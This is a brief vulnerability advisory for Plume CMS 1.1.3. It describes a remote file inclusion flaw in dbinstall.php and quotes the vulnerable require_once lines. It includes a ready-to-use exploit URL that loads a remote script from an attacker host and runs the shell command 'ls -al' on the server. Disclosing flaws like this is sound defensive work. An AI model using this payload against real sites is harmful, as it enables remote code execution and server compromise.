The original article can be found at: http://www.hamid.ir/security/ http://www.IHSteam.com Vulnerable Systems: Plume CMS 1.1.3 Vulnerable Code : [path]/plume-1.1.3/plume/manager/tools/link/dbinstall.php //Vulnerable Code :line 39 require_once $_PX_config['manager_path'].'/inc/class.checklist.php'; require_once $_PX_config['manager_path'].'/extinc/class.xmlsql.php'; Exploits: The following URL will cause the server to include external files http://localhost/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls -al&_PX_config[manager_path]=http://attacker/cmd.gif? cmd.gif Solution: Edit the source code to ensure that input is properly verified. greeting : LorD , NT , C0d3r of IHS